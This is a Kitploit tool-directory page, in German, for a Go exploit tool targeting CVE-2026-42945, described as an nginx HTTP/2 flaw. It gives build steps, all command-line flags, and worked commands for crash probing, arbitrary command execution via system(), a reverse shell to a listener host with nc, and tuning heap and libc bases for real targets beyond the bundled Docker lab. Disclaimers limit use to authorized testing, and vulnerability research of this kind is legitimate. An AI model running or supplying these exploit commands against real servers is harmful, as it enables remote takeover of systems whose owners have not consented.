Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-42945 — Go-basiertes PoC-Tool für CVE-2026-42945 (nginx HTTP/2) mit Erkennung, Crash-Erprobung, Befehlsausführung und Reverse-Shell-Funktionen in autorisierten Umgebungen. | Kitploit
Tools/GitHubGitHub/redcrazyghost/cve-2026-42945
SchwachstellenanalyseExploitationWebanwendungs-ExploitationFuzzingPenetrationstestsBinary-Exploitation
GitHubredcrazyghost/cve-2026-42945

CVE-2026-42945

Go-basiertes PoC-Tool für CVE-2026-42945 (nginx HTTP/2) mit Erkennung, Crash-Erprobung, Befehlsausführung und Reverse-Shell-Funktionen in autorisierten Umgebungen.

Repository anzeigen
1vor 3 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-42945 PoC (Go)

Deutsch | English

Ein Erkennungs- und Exploit-Hilfstool für die nginx HTTP/2-Implementierung (CVE-2026-42945), das in autorisierten Umgebungen verwendet wird, um das Vorhandensein der Schwachstelle zu überprüfen, die Wirksamkeit von Patches zu testen und das PoC-Verhalten in kontrollierten Testumgebungen zu reproduzieren.

Betroffene Versionen (grobe Einschätzung): nginx 0.6.27 – 1.30.0; 1.30.1+ / 1.31.0+ sind behoben.


⚠️ Haftungsausschluss (unbedingt lesen)

Dieses Repository dient ausschließlich der Sicherheitsforschung, Schwachstellenverifikation und defensiven Tests.

  1. Rechtmäßige Autorisierung: Du darfst dieses Tool nur auf Systemen verwenden, für die du eine ausdrückliche schriftliche Genehmigung hast oder die vollständig in deinem Besitz sind. Das Scannen, Erkunden oder Angreifen fremder Netzwerke/Server ohne Autorisierung ist rechtswidrig. Die Autoren und Mitwirkenden übernehmen keinerlei rechtliche Haftung.
  2. Eigenverantwortung: Die Nutzung kann zum Absturz von Worker-Prozessen, Betriebsunterbrechungen oder Datenverlust führen. Du musst die Auswirkungen selbst abschätzen und zuerst in einer isolierten Umgebung testen.
  3. Keine Garantie: Dieses Tool wird „wie besehen“ bereitgestellt. Es wird nicht garantiert, dass es in einer realen Produktionsumgebung erfolgreich funktioniert. Seitenkanalergebnisse bedeuten nicht eine erreichte RCE – dies muss durch unabhängige Verifikation (Dateiablage, Befehlsausgabe, Reverse Shell) bestätigt werden.
  4. Missbrauch verboten: Es ist untersagt, dieses Tool für das Eindringen in nicht autorisierte Systeme, Erpressung, Zerstörung, Kryptomining oder andere illegale Zwecke zu verwenden. Durch Herunterladen, Kompilieren oder Nutzung erklärst du, dass du diesen Haftungsausschluss gelesen hast und ihm zustimmst.
  5. Keine Verbindung zu NGINX: Dieses Projekt ist eine unabhängige Forschungsimplementierung und repräsentiert nicht die Position von NGINX, Inc. oder anderer Hersteller.

Wenn du mit den obigen Bedingungen nicht einverstanden bist, stelle die Nutzung sofort ein und lösche dieses Repository.


Funktionsübersicht


Systemvoraussetzungen

  • Go ≥ 1.26 (siehe go.mod)
  • Optional: Docker + docker compose (lokale Testumgebung)
  • Optional: make, golangci-lint (Entwicklung/Code-Check)
  • Exploit-Verifikation: Ziel muss erforderliche PoC-Endpunkte (GET /api/, POST /spray usw.) bereitstellen; Docker-Testimages enthalten diese bereits.

Einschränkungen und Anwendungsbereich


Bauen

root@kitploit:~
# Schnellbuild (Ausgabe nach bin/, von .gitignore ignoriert)
make build-cmd

# Oder direkt mit go
go build -o ./bin/cve-2026-42945 ./cmd

# Eingebettete Version anzeigen
./bin/cve-2026-42945 -version

Veröffentlichte Binärdateien: Lade cve-2026-42945-<os>-<arch> von Releases herunter (automatisch gebaut von GitHub Actions nach Push eines v*-Tags).


Benutzerhandbuch

Befehlszeilenparameter

root@kitploit:~
-target string      Ziel-IP/Hostname (Standard 127.0.0.1)
-port int           Ziel-Port (0=80; Docker-Schwachstellenversion oft 19321)
-docker             Lokale Docker-Experimentierumgebung testen (vuln:19321, fixed:19331)
-check-only         Nur Erkennung, kein Exploit-Traffic senden
-probe-crash        Overflow-Erkennung + Seitenkanal durch Worker-Absturz
-cmd string         Befehl zur Ausführung über system()
-shell              Reverse Shell (erfordert -lhost)
-lhost string       Lokale IP für Reverse Shell
-lport int          Lokaler Port für Reverse Shell (Standard 4444)
-docker-profile     Heap-/libc-Basen aus deploy/docker verwenden
-heap-base string   Heap-Basis (hexadezimal, z.B. 0x555555659000)
-libc-base string   libc-Basis (hexadezimal)
-tries int          Anzahl Versuche pro Heap-Kandidat (Standard 10)
-timeout int        HTTP-Timeout in Sekunden (Standard 5)
-v                  Ausführliche Ausgabe
-version            Version anzeigen und beenden

Der Modus -docker kann nicht gleichzeitig mit -cmd / -shell verwendet werden; für Einzelziele nutze -port 19321.

1. Nur Ziel-Erkennung

root@kitploit:~
./bin/cve-2026-42945 -target 192.168.1.10 -port 80 -check-only

2. Crash-Seitenkanal (Einzelziel)

root@kitploit:~
./bin/cve-2026-42945 -port 19321 -probe-crash -v

3. Lokale Docker-Experimentierumgebung

Starte zuerst die Testcontainer:

root@kitploit:~
make docker-up
# oder
docker compose -f deploy/docker-compose.yml up -d --build

Erster Build kompiliert nginx, kann einige Minuten dauern; warte, bis docker compose ps den Status healthy anzeigt, bevor du make test-lab ausführst.

DienstPortBeschreibung
vuln19321nginx 1.30.0 (anfällig)
fixed19331nginx 1.30.1 (behoben)

Batch-Erkennung:

root@kitploit:~
./bin/cve-2026-42945 -docker -check-only
./bin/cve-2026-42945 -docker -probe-crash

Oder mit Makefile-Kurzbefehlen:

root@kitploit:~
make test-lab          # check + probe
make cmd-exploit       # Schreibt /tmp/pwned auf vuln und zeigt Verifikationsbefehl

4. Befehl auf Docker vuln ausführen (RCE-Verifikation)

Die höchste Erfolgsrate wird erreicht, wenn ASLR deaktiviert ist (setarch -R) und die voreingestellten Basen aus -docker-profile verwendet werden:

root@kitploit:~
./bin/cve-2026-42945 -port 19321 -docker-profile \
  -cmd 'echo pwned > /tmp/pwned' -v

# Prüfen, ob Datei geschrieben wurde
docker exec nginx-rift-vuln-1.30.0 cat /tmp/pwned

5. Reverse Shell

root@kitploit:~
# Terminal 1: Tool starten (versucht nc-Hintergrundlistener)
./bin/cve-2026-42945 -port 19321 -docker-profile -shell -lhost 10.0.0.5 -lport 4444 -v

# Falls nc nicht gefunden wird, manuell lauschen:
nc -lvnp 4444

6. Benutzerdefiniertes Speicherlayout

Wenn sich ASLR, libc-Version oder Heap-Basen des echten Ziels von denen in Docker unterscheiden, müssen die Basen selbst ermittelt oder geschätzt werden:

root@kitploit:~
# Ziel muss Klartext-HTTP-Port sein (nicht TLS)
./bin/cve-2026-42945 -target TARGET -port 8080 \
  -heap-base 0x555555659000 \
  -libc-base 0x7ffff77ba000 \
  -cmd 'id' -tries 20 -v

Ergebnisinterpretation

  • [+] Seitenkanal: Worker anormal: Zeigt nur an, dass ein Worker möglicherweise durch Overflow abgestürzt ist. Allein kein Beweis für RCE.
  • Zwingend zweite Verifikation: Prüfe Befehlseffekte (Datei, Prozess, docker exec usw.).
  • Häufige Fehlerursachen: ASLR aktiviert, falsche libc/Heap-Offsets, PoC-Endpunkt nicht verfügbar, WAF/Rate-Limiting, Container benötigt Neustart.

Projektstruktur

root@kitploit:~
cmd/                 Hauptprogrammeinstieg
internal/rift/       Erkennungs-, Payload- und Exploit-Logik
deploy/docker/       Experimentelle Images (nginx 1.30.0 / 1.30.1)
deploy/docker-compose.yml
.github/workflows/   Multi-Plattform-Release-Builds

Entwicklung

root@kitploit:~
make help            # Alle make-Ziele anzeigen
make test            # Unit-Tests
make lint            # golangci-lint
make version         # Aktuelle Build-Version anzeigen

Neue Version veröffentlichen:

root@kitploit:~
git tag v1.0.0
git push origin v1.0.0

Referenzen

  • Repository: https://github.com/RedCrazyGhost/CVE-2026-42945
  • CVE: CVE-2026-42945 (nginx HTTP/2-bezogene Schwachstelle; siehe offizielle Ankündigungen)
  • Lizenz: MIT License
  • Sicherheitsfragen: SECURITY.md

Erneuter Hinweis

Verwende dieses Tool nur auf Systemen, die du testen darfst. Jeglicher Missbrauch liegt außerhalb der Verantwortung der Autoren.

Tool herunterladen
ModusBeschreibung
-check-onlyKonnektivität, Server-Header, grobe Versionsprüfung, PoC-Endpunkt-Erkennung
-probe-crashSenden eines Overflow-Exploits, Seitenkanalanalyse durch Worker-Absturz
-cmdErstellen einer Exploit-Payload, Ausführung eines Befehls über system()
-shellReverse Shell (erfordert -lhost, auf lokalem Rechner nc nötig)
-dockerBatch-Tests in lokaler Docker-Experimentierumgebung (vuln / fixed)
PunktBeschreibung
ProtokollNur Klartext-HTTP (net.Dial + rohe HTTP-Bytes) unterstützt, kein HTTPS/TLS. Für TLS-Ports (z.B. -port 443) muss ein TLS-Terminator vorgeschaltet werden oder ein HTTP-Port verwendet werden.
Docker-TestsImages sind linux/amd64. Der erste docker compose build kompiliert nginx aus dem Quellcode, was lange dauert. Im Container wird ASLR mit setarch -R deaktiviert – ein großer Unterschied zur Produktion.
Apple SiliconLokaler Docker läuft emuliert über platform: linux/amd64, vergleichsweise langsam.
Reverse Shell-shell benötigt systemeigenes nc; unter Windows ist manuelles Lauschen empfohlen.
ErfolgsbewertungSeitenkanal (Worker-Absturz) bedeutet nicht RCE. Befehlseffekte müssen unabhängig verifiziert werden.